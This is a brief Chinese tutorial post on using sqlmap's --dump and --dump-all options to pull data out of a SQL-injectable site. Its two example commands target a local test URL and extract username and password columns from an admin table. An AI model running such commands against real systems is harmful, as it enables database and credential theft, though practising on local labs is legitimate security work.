首页 > 代码库 > SQLMAP脱裤
SQLMAP脱裤
之前就有一个朋友问,咋使用sqlmap脱裤。然后我丢了一个参数给他,他好像懵逼懵逼的。今天又有一个哥们儿在群里问,行吧。就直接教一下。
其实很简单。
--dump这个参数就是用来脱裤的哟。如果你要拖整个表的话你可以加个-all(--dump-all)
CODE:
sqlmap.py -u "http://127.0.0.1/index.php?id=1" --dump -D sqlinject -T admin -C "id,username,password"
脱出数据如下所示:
仅一个文件。就是你选定了的数据。
那么我们加all呢?(PS:此时可以把那些字段都给去掉。)
CODE:
sqlmap.py -u "http://127.0.0.1/index.php?id=1" -D sqlinject --dump-all
可见如下是三个文件。
这三个文件是啥呢?解惑便是下图所示。
SQLMAP脱裤
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。